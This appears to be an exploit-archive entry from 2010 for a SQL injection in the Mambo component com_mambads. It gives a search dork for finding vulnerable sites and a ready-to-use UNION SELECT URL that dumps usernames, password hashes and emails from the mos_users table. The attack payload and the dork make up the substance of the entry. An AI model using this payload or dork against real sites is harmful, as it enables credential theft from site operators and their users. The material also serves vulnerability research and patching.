Mambo Component MambAds - SQL Injection

Author: Dreadful
type: webapps
platform: php
port: 
date_added: 2010-03-12 
date_updated: 2016-12-06 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

==============================================================================
[»] Mambo com_mambads Remote Sql Injection Vulnerability
==============================================================================

[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Dreadful Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4    sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Dork     :[ inurl:index.php?option=com_mambads
###########################################################################
 ===[ Exploit ]===

[»] http://server/index.php?option=com_mambads&Itemid=39&func=view&cacat=33&casb=1+UNION all SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password,0x3a,email),17,18,19,20,21,22,23+from+mos_users--
[»]Author: Dreadful <-
###########################################################################